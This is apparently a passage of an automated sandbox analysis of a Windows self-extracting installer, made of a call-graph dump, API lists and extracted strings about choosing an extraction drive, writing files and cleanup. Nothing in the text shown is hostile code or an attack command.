GetLastError 17386->17388 17386->17389 17387 2167c1 InitializeCriticalSection CreateEventA 17387->17319 17387->17320 17388->17387 17389->17385 17389->17386 17389->17387 17391 216a49 17390->17391 17392 216a3e 17390->17392 17393 21854a 118 API calls 17392->17393 17393->17391 17395 21aca4 17394->17395 17396 21aca7 17395->17396 17442 2188ed 17395->17442 17399 21adcc 17396->17399 17401 218e6f 3 API calls 17396->17401 17402 2291d5 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 17399->17402 17400 21acf6 #20 17400->17396 17403 21ad54 17400->17403 17401->17399 17404 21addb 17402->17404 17404->17356 17407 21adf4 __write_nolock 17406->17407 17408 2184c7 118 API calls 17407->17408 17409 21ae1e 17408->17409 17410 21ae47 17409->17410 18160 2164d8 17409->18160 17412 219711 7 API calls 17410->17412 17414 21b045 17410->17414 17413 21ae63 17412->17413 17416 2191d3 15 API calls 17413->17416 17425 21aeb3 17413->17425 17415 2291d5 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 17414->17415 17418 21b053 17415->17418 17418->17356 17425->17414 17443 218904 17442->17443 17444 21891e WideCharToMultiByte 17442->17444 17486 219a43 GetProcessHeap HeapSize 17443->17486 17445 218936 17444->17445 17446 218998 GetLastError 17444->17446 17448 218984 WideCharToMultiByte 17445->17448 17450 218912 17445->17450 17451 218954 GetProcessHeap HeapReAlloc 17445->17451 17452 218966 GetProcessHeap HeapAlloc 17445->17452 17446->17450 17448->17446 17448->17450 17449 21890a 17449->17444 17449->17450 17450->17396 17450->17400 17453 218975 17451->17453 17452->17453 17453->17448 17453->17450 17486->17449 18161 2164f9 18160->18161 18162 2164ea 18160->18162 18163 2169e3 2 API calls 18161->18163 18180 216574 18161->18180 18162->18161 18164 2164f1 18162->18164 18165 216553 18162->18165 18166 216544 18162->18166 18178 216505 18162->18178 18179 21657b 18162->18179 18163->18180 18170 2165c6 18170->17410 18175 2169b0 SendMessageA 18175->18178 18176 2169b0 SendMessageA 18176->18179 18177 21854a 118 API calls 18177->18170 18178->18161 18178->18175 18179->18161 18179->18176 18180->18170 18180->18177 18257 234882 _memset 18256->18257 18258 2291d5 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 18257->18258 18259 21a1cb 18258->18259 18259->17365 18259->17378 18261 219926 10 API calls 18260->18261 18262 219679 18261->18262 18263 21967f SetCurrentDirectoryW 18262->18263 18266 219698 18262->18266 18264 21968c GetLastError 18263->18264 18263->18266 18264->18266 18265 215e5f 18265->16556 18265->16578 18266->18265 18267 218e6f 3 API calls 18266->18267 18267->18265 18288 22bf47 18287->18288 18289 22bf5c 18287->18289 18291 22b059 __commit 66 API calls 18288->18291 18290 22bf6a 18289->18290 18292 22bf77 18289->18292 18293 22b059 __commit 66 API calls 18290->18293 18294 22bf4c 18291->18294 18303 22be41 18292->18303 18302 22bf6f 18293->18302 18296 22affd __commit 11 API calls 18294->18296 18298 22bf57 18296->18298 18298->16594 18299 22affd __commit 11 API calls 18300 22bfaf 18299->18300 18300->16594 18301 22b059 __commit 66 API calls 18301->18302 18302->18299 18304 22be77 18303->18304 18305 22be5f 18303->18305 18308 22be86 18304->18308 18314 22be9e 18304->18314 18306 22b059 __commit 66 API calls 18305->18306 18307 22be64 18306->18307 18309 22affd __commit 11 API calls 18307->18309 18310 22b059 __commit 66 API calls 18308->18310 18316 22be6f 18309->18316 18311 22be8b 18310->18311 18312 22affd __commit 11 API calls 18311->18312 18312->18316 18313 22bee5 18313->18316 18317 22b0db __flsbuf 97 API calls 18313->18317 18314->18313 18314->18316 18318 22b0db 18314->18318 18316->18300 18316->18301 18317->18316 18339 22e8bc 18318->18339 18320 22b0eb 18321 22b0f6 18320->18321 18322 22b10d 18320->18322 18323 22b059 __commit 66 API calls 18321->18323 18324 22b111 18322->18324 18327 22b11e _vwprintf_helper 18322->18327 18326 22b0fb 18323->18326 18325 22b059 __commit 66 API calls 18324->18325 18325->18326 18326->18313 18327->18326 18335 22b174 18327->18335 18338 22b17f 18327->18338 18346 22e861 18327->18346 18328 22b20e 18330 22e73a __write 97 API calls 18328->18330 18329 22b18e 18331 22b1a5 18329->18331 18333 22b1c2 18329->18333 18330->18326 18358 22e73a 18331->18358 18333->18326 18383 22df49 18333->18383 18335->18338 18355 22e813 18335->18355 18338->18328 18338->18329 18340 22e8c8 18339->18340 18341 22e8dd 18339->18341 18342 22b059 __commit 66 API calls 18340->18342 18341->18320 18343 22e8cd 18342->18343 18344 22affd __commit 11 API calls 18343->18344 18345 22e8d8 18344->18345 18345->18320 18347 22e86e 18346->18347 18348 22e87d 18346->18348 18349 22b059 __commit 66 API calls 18347->18349 18350 22e89b 18348->18350 18351 22b059 __commit 66 API calls 18348->18351 18353 22e873 18349->18353 18350->18335 18352 22e88e 18351->18352 18354 22affd __commit 11 API calls 18352->18354 18353->18335 18354->18353 18356 22dbda __malloc_crt 66 API calls 18355->18356 18357 22e828 18356->18357 18357->18338 18359 22e746 __commit 18358->18359 18360 22e769 18359->18360 18361 22e74e 18359->18361 18362 22e775 18360->18362 18367 22e7af 18360->18367 18408 22b071 18361->18408 18364 22b071 __commit 66 API calls 18362->18364 18366 22e77a 18364->18366 18369 22b059 __commit 66 API calls 18366->18369 18411 231a49 18367->18411 18368 22b059 __commit 66 API calls 18371 22e75b __commit 18368->18371 18372 22e782 18369->18372 18371->18326 18374 22affd __commit 11 API calls 18372->18374 18373 22e7b5 18375 22e7c3 18373->18375 18376 22e7d7 18373->18376 18374->18371 18421 22e038 18375->18421 18377 22b059 __commit 66 API calls 18376->18377 18379 22e7dc 18377->18379 18381 22b071 __commit 66 API calls 18379->18381 18380 22e7cf 18480 22e806 18380->18480 18381->18380 18384 22df55 __commit 18383->18384 18385 22df82 18384->18385 18386 22df66 18384->18386 18388 22df8e 18385->18388 18391 22dfc8 18385->18391 18387 22b071 __commit 66 API calls 18386->18387 18389 22df6b 18387->18389 18390 22b071 __commit 66 API calls 18388->18390 18392 22b059 __commit 66 API calls 18389->18392 18393 22df93 18390->18393 18394 231a49 ___lock_fhandle 68 API calls 18391->18394 18401 22df73 __commit 18392->18401 18395 22b059 __commit 66 API calls 18393->18395 18397 22dfce 18394->18397 18396 22df9b 18395->18396 18398 22affd __commit 11 API calls 18396->18398 18399 22dff8 18397->18399 18400 22dfdc 18397->18400 18398->18401 18403 22b059 __commit 66 API calls 18399->18403 18402 22debf __lseeki64_nolock 68 API calls 18400->18402 18401->18326 18404 22dfed 18402->18404 18405 22dffd 18403->18405 18522 22e029 18404->18522 18406 22b071 __commit 66 API calls 18405->18406 18406->18404 18409 22a6d5 __getptd_noexit 66 API calls 18408->18409 18410 22b076 18409->18410 18410->18368 18412 231a55 __commit 18411->18412 18413 231aaf 18412->18413 18414 22d1bd __lock 66 API calls 18412->18414 18415 231ad1 __commit 18413->18415 18416 231ab4 EnterCriticalSection 18413->18416 18417 231a81 18414->18417 18415->18373 18416->18415 18418 231a8a InitializeCriticalSectionAndSpinCount 18417->18418 18419 231a9d 18417->18419 18418->18419 18483 231adf 18419->18483 18422 22e047 __write_nolock 18421->18422 18423 22e09c 18422->18423 18424 22e07d 18422->18424 18453 22e072 18422->18453 18429 22e0f8 18423->18429 18430 22e0db 18423->18430 18425 22b071 __commit 66 API calls 18424->18425 18427 22e082 18425->18427 18426 2291d5 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 18428 22e733 18426->18428 18432 22b059 __commit 66 API calls 18427->18432 18428->18380 18431 22e10b 18429->18431 18487 22debf 18429->18487 18433 22b071 __commit 66 API calls 18430->18433 18436 22e861 __write_nolock 66 API calls 18431->18436 18435 22e089 18432->18435 18437 22e0e0 18433->18437 18438 22affd __commit 11 API calls 18435->18438 18439 22e114 18436->18439 18440 22b059 __commit 66 API calls 18437->18440 18438->18453 18441 22e3b6 18439->18441 18446 22a753 __getptd 66 API calls 18439->18446 18442 22e0e8 18440->18442 18444 22e666 WriteFile 18441->18444 18445 22e3c5 18441->18445 18443 22affd __commit 11 API calls 18442->18443 18443->18453 18449 22e398 18444->18449 18450 22e699 GetLastError 18444->18450 18447 22e480 18445->18447 18457 22e3d8 18445->18457 18448 22e12f GetConsoleMode 18446->18448 18462 22e48d 18447->18462 18471 22e55a 18447->18471 18448->18441 18452 22e158 18448->18452 18451 22e6e4 18449->18451 18449->18453 18455 22e6b7 18449->18455 18450->18449 18451->18453 18458 22b059 __commit 66 API calls 18451->18458 18452->18441 18454 22e168 GetConsoleCP 18452->18454 18453->18426 18454->18449 18474 22e18b 18454->18474 18460 22e6c2 18455->18460 18461 22e6d6 18455->18461 18456 22e422 WriteFile 18456->18450 18456->18457 18457->18449 18457->18451 18457->18456 18464 22e707 18458->18464 18459 22e5cb WideCharToMultiByte 18459->18450 18467 22e602 WriteFile 18459->18467 18466 22b059 __commit 66 API calls 18460->18466 18500 22b089 18461->18500 18462->18449 18462->18451 18463 22e4fc WriteFile 18462->18463 18463->18450 18463->18462 18465 22b071 __commit 66 API calls 18464->18465 18465->18453 18469 22e6c7 18466->18469 18470 22e639 GetLastError 18467->18470 18467->18471 18473 22b071 __commit 66 API calls 18469->18473 18470->18471 18471->18449 18471->18451 18471->18459 18471->18467 18473->18453 18474->18449 18474->18450 18475 22e237 WideCharToMultiByte 18474->18475 18477 22f7d3 78 API calls __fassign 18474->18477 18478 231b19 WriteConsoleW CreateFileW __write_nolock 18474->18478 18479 22e2bc WriteFile 18474->18479 18497 22f82f 18474->18497 18475->18449 18476 22e268 WriteFile 18475->18476 18476->18450 18476->18474 18477->18474 18478->18474 18479->18450 18479->18474 18521 231aed LeaveCriticalSection 18480->18521 18482 22e80c 18482->18371 18486 22d0da LeaveCriticalSection 18483->18486 18485 231ae6 18485->18413 18486->18485 18505 2319db 18487->18505 18489 22dedd 18490 22def6 SetFilePointer 18489->18490 18491 22dee5 18489->18491 18493 22df0e GetLastError 18490->18493 18495 22deea 18490->18495 18492 22b059 __commit 66 API calls 18491->18492 18492->18495 18494 22df18 18493->18494 18493->18495 18496 22b089 __dosmaperr 66 API calls 18494->18496 18495->18431 18496->18495 18518 22f7f2 18497->18518 18501 22b071 __commit 66 API calls 18500->18501 18502 22b094 __dosmaperr 18501->18502 18503 22b059 __commit 66 API calls 18502->18503 18506 2319e8 18505->18506 18509 231a00 18505->18509 18507 22b071 __commit 66 API calls 18506->18507 18508 2319ed 18507->18508 18512 22b059 __commit 66 API calls 18508->18512 18510 22b071 __commit 66 API calls 18509->18510 18511 231a3f 18509->18511 18513 231a11 18510->18513 18511->18489 18515 2319f5 18512->18515 18514 22b059 __commit 66 API calls 18513->18514 18516 231a19 18514->18516 18515->18489 18517 22affd __commit 11 API calls 18516->18517 18517->18515 18519 2292e9 _LocaleUpdate::_LocaleUpdate 76 API calls 18518->18519 18520 22f805 18519->18520 18520->18474 18521->18482 18525 231aed LeaveCriticalSection 18522->18525 18524 22e031 18524->18401 18525->18524 18526->16599 18528 218cb2 18527->18528 18529 218cac 18527->18529 18531 218ce9 18528->18531 18545 219a43 GetProcessHeap HeapSize 18528->18545 18544 219a43 GetProcessHeap HeapSize 18529->18544 18533 218cee 18531->18533 18543 218d08 18531->18543 18546 218836 18533->18546 18534 218ccc 18536 218577 18534->18536 18537 218cde lstrlenA 18534->18537 18536->16604 18536->16610 18537->18531 18539 218cfe 18539->18536 18540 218d94 18539->18540 18541 218836 4 API calls 18539->18541 18539->18543 18540->18536 18542 218e6f 3 API calls 18540->18542 18541->18539 18542->18536 18543->18539 18543->18540 18551 233517 18543->18551 18544->18528 18545->18534 18547 218847 18546->18547 18550 218870 18546->18550 18548 218861 GetProcessHeap HeapAlloc 18547->18548 18549 218850 GetProcessHeap HeapReAlloc 18547->18549 18548->18550 18549->18550 18550->18539 18554 233466 18551->18554 18555 233482 18554->18555 18556 233497 18554->18556 18557 22b059 __commit 66 API calls 18555->18557 18558 2334bb 18556->18558 18560 2334a6 18556->18560 18559 233487 18557->18559 18569 22eaec 18558->18569 18562 22affd __commit 11 API calls 18559->18562 18563 22b059 __commit 66 API calls 18560->18563 18567 233492 18562->18567 18564 2334ab 18563->18564 18565 22affd __commit 11 API calls 18564->18565 18565->18567 18566 2334e9 18566->18567 18568 22b0db __flsbuf 97 API calls 18566->18568 18567->18543 18568->18567 18570 2292e9 _LocaleUpdate::_LocaleUpdate 76 API calls 18569->18570 18571 22eb53 18570->18571 18572 22eb57 18571->18572 18575 22e8bc __fflush_nolock 66 API calls 18571->18575 18587 22eb8e __output_l __aulldvrm _strlen 18571->18587 18573 22b059 __commit 66 API calls 18572->18573 18574 22eb5c 18573->18574 18576 22affd __commit 11 API calls 18574->18576 18575->18587 18577 22eb67 18576->18577 18578 2291d5 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 18577->18578 18579 22f673 18578->18579 18579->18566 18580 22f7f2 __isleadbyte_l 76 API calls 18580->18587 18581 22c318 _free 66 API calls 18581->18587 18582 22eef4 18583 22f1e3 _DecodePointerInternal 18582->18583 18585 22dbda __malloc_crt 66 API calls 18582->18585 18588 22ef31 18582->18588 18584 22f232 18583->18584 18586 22f25e 18584->18586 18589 22f24c _DecodePointerInternal 18584->18589 18585->18588 18590 22f27f 18586->18590 18592 22f26d _DecodePointerInternal 18586->18592 18587->18572 18587->18577 18587->18580 18587->18581 18587->18582 18591 22ea73 97 API calls _write_string 18587->18591 18593 231e55 97 API calls __output_l 18587->18593 18594 231e33 78 API calls __cftof 18587->18594 18588->18583 18589->18586 18590->18566 18591->18587 18592->18590 18593->18587 18594->18587 18596 219926 10 API calls 18595->18596 18597 219c39 18596->18597 18598 219c42 DeleteFileW 18597->18598 18599 219c76 18597->18599 18598->18599 18600 219c4d GetLastError 18598->18600 18601 219c95 18599->18601 18603 218e6f 3 API calls 18599->18603 18600->18599 18602 219c5a 18600->18602 18601->16637 18602->18599 18604 219c5f MoveFileExW 18602->18604 18603->18601 18604->18599 18605 219c6e GetLastError 18604->18605 18605->18599 18607 219926 10 API calls 18606->18607 18608 2192e9 18607->18608 18609 21952f 18608->18609 18610 2192f8 GetFileAttributesW 18608->18610 18613 219550 FindClose 18609->18613 18614 21955c 18609->18614 18611 219325 18610->18611 18612 219319 GetLastError 18610->18612 18611->18609 18616 21958e 18611->18616 18617 219366 18611->18617 18618 219349 SetFileAttributesW 18611->18618 18612->18611 18613->18614 18615 219570 18614->18615 18619 218e6f 3 API calls 18614->18619 18615->18616 18620 219574 RemoveDirectoryW 18615->18620 18622 2195ab 18616->18622 18624 218e6f 3 API calls 18616->18624 18617->18616 18617->18620 18626 218889 7 API calls 18617->18626 18618->18617 18623 21935a GetLastError 18618->18623 18619->18615 18620->18616 18621 219584 GetLastError 18620->18621 18621->18616 18625 2291d5 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 18622->18625 18623->18617 18624->18622 18627 2195ba 18625->18627 18628 219399 18626->18628 18627->16638 18628->18614 18629 218abb 6 API calls 18628->18629 18630 2193b5 18629->18630 18630->18614 18631 2193bf FindFirstFileW 18630->18631 18632 2193dd GetLastError 18631->18632 18641 2193e9 18631->18641 18632->18641 18633 219509 FindNextFileW 18635 219524 GetLastError 18633->18635 18633->18641 18634 218889 7 API calls 18634->18641 18635->18609 18636 218abb 6 API calls 18636->18641 18637 2194e1 DeleteFileW 18637->18633 18640 2194f1 GetLastError 18637->18640 18638 2194b8 SetFileAttributesW 18638->18637 18639 2194c9 GetLastError 18638->18639 18639->18641 18640->18641 18641->18609 18641->18614 18641->18633 18641->18634 18641->18636 18641->18637 18641->18638 18642 2192bb 15 API calls 18641->18642 18642->18641 18644 218dc6 18643->18644 18645 218dcb FormatMessageW 18643->18645 18644->18645 18646 218e12 18645->18646 18647 218def GetLastError 18645->18647 18649 218889 7 API calls 18646->18649 18648 218dfb 18647->18648 18650 218e24 LocalFree 18648->18650 18651 215d40 18648->18651 18649->18648 18650->18651 18651->16671 18651->16672 18672 233923 18652->18672 18654 218518 18655 21848d 18654->18655 18657 21849b 18655->18657 18656 2184c0 18659 21870c 18656->18659 18657->18656 18658 21870c 117 API calls 18657->18658 18658->18656 18660 218c9a 112 API calls 18659->18660 18661 21872e 18660->18661 18662 218735 lstrlenA 18661->18662 18671 21879a 18661->18671 18664 218770 18662->18664 18665 21874b WriteFile 18662->18665 18663 218535 18663->16687 18669 218775 WriteFile 18664->18669 18664->18671 18667 218768 18665->18667 18668 2187be GetLastError 18665->18668 18666 218e6f 3 API calls 18666->18663 18667->18664 18667->18665 18668->18671 18670 21878d GetLastError 18669->18670 18669->18671 18670->18671 18671->18663 18671->18666 18673 233943 18672->18673 18674 23392e 18672->18674 18675 233951 18673->18675 18678 23395e 18673->18678 18676 22b059 __commit 66 API calls 18674->18676 18679 22b059 __commit 66 API calls 18675->18679 18677 233933 18676->18677 18680 22affd __commit 11 API calls 18677->18680 18688 233854 18678->18688 18681 233956 18679->18681 18683 23393e 18680->18683 18685 22affd __commit 11 API calls 18681->18685 18683->18654 18686 233994 18685->18686 18686->18654 18687 22b059 __commit 66 API calls 18687->18681 18689 233872 18688->18689 18690 23388a 18688->18690 18691 22b059 __commit 66 API calls 18689->18691 18693 233899 18690->18693 18697 2338ae 18690->18697 18692 233877 18691->18692 18694 22affd __commit 11 API calls 18692->18694 18695 22b059 __commit 66 API calls 18693->18695 18699 233882 18694->18699 18696 23389e 18695->18696 18698 22affd __commit 11 API calls 18696->18698 18697->18699 18700 22b0db __flsbuf 97 API calls 18697->18700 18698->18699 18699->18686 18699->18687 18700->18699 18704 229927 18701->18704 18703 229a98 18705 229933 __commit 18704->18705 18706 22d1bd __lock 61 API calls 18705->18706 18707 22993a 18706->18707 18709 229965 _DecodePointerInternal 18707->18709 18713 2299e4 18707->18713 18711 22997c _DecodePointerInternal 18709->18711 18709->18713 18723 22998f 18711->18723 18712 229a61 __commit 18712->18703 18727 229a52 18713->18727 18715 229a49 18717 2297f1 _doexit 3 API calls 18715->18717 18718 229a52 18717->18718 18719 229a5f 18718->18719 18732 22d0da LeaveCriticalSection 18718->18732 18719->18703 18720 2299a6 _DecodePointerInternal 18726 22a539 _EncodePointerInternal 18720->18726 18723->18713 18723->18720 18724 2299b5 _DecodePointerInternal _DecodePointerInternal 18723->18724 18725 22a539 _EncodePointerInternal 18723->18725 18724->18723 18725->18723 18726->18723 18728 229a32 18727->18728 18729 229a58 18727->18729 18728->18712 18731 22d0da LeaveCriticalSection 18728->18731 18733 22d0da LeaveCriticalSection 18729->18733 18731->18715 18732->18719 18733->18728 18734 216a56 18735 216b1d 18734->18735 18736 216a6f 18734->18736 18737 216b76 GetDlgItem 18735->18737 18739 216b29 18735->18739 18736->18737 18738 216a75 18736->18738 18740 216b6e SendMessageW 18737->18740 18741 216b88 GetLastError 18737->18741 18742 216b14 PostQuitMessage 18738->18742 18743 216a7f 18738->18743 18744 216b34 GetDlgItem 18739->18744 18749 216abb 18739->18749 18740->18749 18753 216b52 18741->18753 18742->18749 18746 216af0 18743->18746 18747 216a84 18743->18747 18744->18740 18748 216b46 GetLastError 18744->18748 18764 216be1 EnterCriticalSection 18746->18764 18751 216ac3 18747->18751 18752 216a8b 18747->18752 18748->18753 18754 216adc SetEvent 18751->18754 18757 216ad4 SetWindowTextW 18751->18757 18752->18749 18760 216be1 12 API calls 18752->18760 18756 21854a 118 API calls 18753->18756 18754->18749 18759 216bb4 18756->18759 18757->18754 18758 216b08 KiUserCallbackDispatcher 18758->18749 18759->18749 18761 216bba EndDialog 18759->18761 18762 216aa6 18760->18762 18761->18749 18762->18749 18763 216aae SendMessageA 18762->18763 18763->18749 18765 216c3d LeaveCriticalSection 18764->18765 18766 216c01 18764->18766 18767 216af8 18765->18767 18768 216c4b 18765->18768 18766->18765 18769 219166 6 API calls 18766->18769 18767->18749 18767->18758 18770 218e6f 3 API calls 18768->18770 18771 216c1a MessageBoxW 18769->18771 18770->18767 18771->18765 18772 216c33 18771->18772 18772->18765

                                                              Executed Functions

                                                              Function 0021774A Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 244COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 127 21774a-217782 call 217cd0 130 217784-217793 call 2187eb 127->130 131 2177a7-2177ca call 2184c7 call 2187eb 127->131 130->131 136 217795-2177a2 call 21854a 130->136 141 2177d6-2177ec GetLogicalDriveStringsW 131->141 142 2177cc-2177d1 131->142 146 2179ef-2179f2 136->146 144 217819-21781b 141->144 145 2177ee-2177f8 GetLastError 141->145 143 2179d8-2179df call 21854a 142->143 163 2179e0-2179e5 143->163 149 217834-21783b 144->149 150 21781d-21782a call 2187eb 144->150 147 217808 145->147 148 2177fa-217806 145->148 152 2179f4-2179f7 call 218e6f 146->152 153 2179fc-217a02 146->153 154 21780a 147->154 155 21780f-217814 147->155 148->147 158 217841-217869 CharUpperW call 2184c7 call 2295a3 149->158 159 217958-21795d 149->159 150->142 165 21782c-217832 GetLogicalDriveStringsW 150->165 152->153 154->155 155->143 171 21786b 158->171 172 21787f-21788b call 217a0a 158->172 161 2179d3 159->161 161->143 163->146 166 2179e7-2179ea call 218e6f 163->166 165->149 166->146 173 217870-217872 call 2184c7 171->173 178 217891-217895 172->178 179 21795f-217964 172->179 177 217877-21787a 173->177 180 21792b-217930 177->180 181 217897-21789d 178->181 182 21789f-2178a9 call 21768d 178->182 179->143 184 217932-21793b 180->184 181->173 188 2178b2-2178bb call 217ae7 182->188 189 2178ab-2178b0 182->189 184->184 186 21793d-217948 184->186 186->158 187 21794e-217951 186->187 190 217953-217956 187->190 191 21796d-217976 187->191 198 2178c1-2178c4 188->198 199 217966-21796b 188->199 189->173 190->159 190->191 194 217978 191->194 195 2179ab-2179ae 191->195 200 21797a-21797d 194->200 201 21797f-217989 call 2184c7 194->201 196 2179b0 195->196 197 2179ce 195->197 202 2179b2-2179b5 196->202 203 2179b7-2179cc call 2184c7 196->203 197->161 204 2178c6-2178cc 198->204 205 2178ce-2178f1 GetDiskFreeSpaceExW 198->205 199->143 200->195 200->201 209 21798e-217991 201->209 202->197 202->203 213 217994-2179a2 call 218889 203->213 204->173 205->180 208 2178f3-2178fd 205->208 211 217916-217919 208->211 212 2178ff-217902 208->212 209->213 211->180 215 21791b 211->215 212->211 214 217904 212->214 213->163 222 2179a4-2179a9 213->222 217 217906-217909 214->217 218 21790b-217914 214->218 219 217922-217928 215->219 220 21791d-217920 215->220 217->211 217->218 218->180 219->180 220->180 220->219 222->143
                                                              APIs
                                                                • Part of subcall function 002187EB: GetProcessHeap.KERNEL32(00000000,?,00000040,00000040,0021917A,00000000,0023BF10,?,?,00216C1A,0000000B,?,?,00216AF8,?), ref: 00218802
                                                                • Part of subcall function 002187EB: HeapReAlloc.KERNEL32(00000000,?,00000040,00000040,0021917A,00000000,0023BF10,?,?,00216C1A,0000000B,?,?,00216AF8,?), ref: 00218809
                                                              • GetLogicalDriveStringsW.KERNELBASE(0000009C,?,00000000,00000000,0023BEF0,?,?,00216F09,?,?,00000000,?,?,00215B53,?,?), ref: 002177E5
                                                              • GetLastError.KERNEL32(?,?,00216F09,?,?,00000000,?,?,00215B53,?,?,?,?,?,0023BEF0), ref: 002177EE
                                                              Strings
                                                              • Failed to allocate memory for logical drives, xrefs: 002177CC
                                                              • Drive '%S' has been selected as the largest fixed drive, xrefs: 00217982
                                                              • Unable to allocate a string for extracion drive, xrefs: 002179A4
                                                              • Unable to allocate the cluster drive map, xrefs: 00217795
                                                              • Considering drive: '%S'..., xrefs: 00217849
                                                              • Unable to get the drive type, xrefs: 0021795F
                                                              • Drive '%S' is rejected because it can't be written to, xrefs: 002178C7
                                                              • Drive '%S' is rejected because it's not a hard disk or RAM disk, xrefs: 002178AB
                                                              • Drive '%S' is rejected because of the unknown or unsuitable drive type, xrefs: 00217898
                                                              • Cluster drive map: '%S', xrefs: 002177AA
                                                              • Failed to get logical drives, xrefs: 0021780F
                                                              • Failed to find any drive to extract to, xrefs: 00217958
                                                              • Drive '%S' is rejected because it's a resource of a cluster, xrefs: 0021786B
                                                              • Drive '%S' has been selected as the largest removable drive, xrefs: 002179BA
                                                              • Failed to dtermine whether a drive can be written to, xrefs: 00217966
                                                              • S[!, xrefs: 00217916
                                                              • Insufficient size on any available drives, xrefs: 002179CE
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocDriveErrorLastLogicalProcessStrings
                                                              • String ID: Cluster drive map: '%S'$Considering drive: '%S'...$Drive '%S' has been selected as the largest fixed drive$Drive '%S' has been selected as the largest removable drive$Drive '%S' is rejected because it can't be written to$Drive '%S' is rejected because it's a resource of a cluster$Drive '%S' is rejected because it's not a hard disk or RAM disk$Drive '%S' is rejected because of the unknown or unsuitable drive type$Failed to allocate memory for logical drives$Failed to dtermine whether a drive can be written to$Failed to find any drive to extract to$Failed to get logical drives$Insufficient size on any available drives$S[!$Unable to allocate a string for extracion drive$Unable to allocate the cluster drive map$Unable to get the drive type
                                                              • API String ID: 3325457267-389475889
                                                              • Opcode ID: cad1440d558cf80f80f4ed05c42be78555383fa58816c622f576e287de919267
                                                              • Instruction ID: 2ec0ec9337f118013b792d5ea11828e7abdff73cf9d629c058e4c8c7ea2894b5
                                                              • Opcode Fuzzy Hash: cad1440d558cf80f80f4ed05c42be78555383fa58816c622f576e287de919267
                                                              • Instruction Fuzzy Hash: FC81D831D3821AABDF11AF94DC81AEEB7F5AFB4310F210026E505B7140DB719AE5CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 002159A6 Relevance: 38.7, APIs: 11, Strings: 11, Instructions: 239COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 223 2159a6-2159fc GetModuleHandleW call 216c5c 226 215a08-215a0e 223->226 227 2159fe-215a03 223->227 229 215a14-215ac3 call 2291e9 call 22de40 call 22921c PathRemoveExtensionW call 22de40 GetEnvironmentVariableW call 229284 call 218889 226->229 230 215ad8-215ade call 218417 226->230 228 215bbf-215bc6 call 21854a 227->228 237 215bc7-215bd2 call 2168fb 228->237 277 215ac5-215aca 229->277 278 215acf-215ad6 229->278 235 215ae3-215afa call 2160af 230->235 244 215b06-215b1d call 216123 235->244 245 215afc-215b01 235->245 247 215bd4 call 21a414 237->247 248 215bd9-215be1 237->248 258 215b29-215b2f 244->258 259 215b1f-215b24 244->259 245->228 247->248 252 215be3-215be8 248->252 253 215bea-215bef call 216463 248->253 256 215bf4-215bf6 252->256 253->256 264 215c07-215c27 call 2184c7 call 218e9c 256->264 265 215bf8-215bfe 256->265 262 215b31-215b35 258->262 263 215b37 258->263 259->228 262->263 268 215b41-215b57 call 216ef5 262->268 263->268 282 215c29-215c39 call 2184c7 264->282 283 215c3c-215c42 264->283 265->264 266 215c00-215c02 call 215cda 265->266 266->264 279 215b60-215b87 #17 GetTickCount call 21621f 268->279 280 215b59-215b5e 268->280 277->228 278->230 278->235 290 215b90-215ba0 GetTickCount call 215945 279->290 291 215b89-215b8e 279->291 280->228 282->283 287 215c44-215c48 call 218e6f 283->287 288 215c4d-215c5b 283->288 287->288 293 215c6b-215c72 288->293 294 215c5d-215c64 CloseHandle 288->294 290->237 306 215ba2-215baf call 215e0b 290->306 291->228 295 215c80-215c87 293->295 296 215c74-215c7a call 218e6f 293->296 294->293 299 215c89-215c8a call 218e6f 295->299 300 215c8f-215c96 295->300 296->295 299->300 304 215c98-215c99 call 218e6f 300->304 305 215c9e-215ca5 300->305 304->305 308 215ca7-215ca8 call 218e6f 305->308 309 215cad-215caf 305->309 311 215bb4-215bb8 306->311 308->309 313 215cb1-215cb5 309->313 314 215cb7-215cb9 309->314 311->237 315 215bba 311->315 316 215cbe-215cd2 call 2291d5 313->316 314->316 315->228
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 002159E3
                                                                • Part of subcall function 00216C5C: GetCommandLineW.KERNEL32(?,00000000,0023BEF0), ref: 00216C76
                                                                • Part of subcall function 00216C5C: CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00216C84
                                                                • Part of subcall function 00216C5C: GetLastError.KERNEL32 ref: 00216C91
                                                              • _wcsrchr.LIBCMT ref: 00215A1C
                                                              • _memset.LIBCMT ref: 00215A37
                                                              • PathRemoveExtensionW.SHLWAPI(?), ref: 00215A58
                                                              • _memset.LIBCMT ref: 00215A72
                                                              • GetEnvironmentVariableW.KERNEL32(temp,?,00000104), ref: 00215A88
                                                              • swprintf.LIBCMT ref: 00215AA3
                                                                • Part of subcall function 00216463: GetProcessHeap.KERNEL32(00000000,00000000,74DF23A0,?,00215BF4), ref: 002164A0
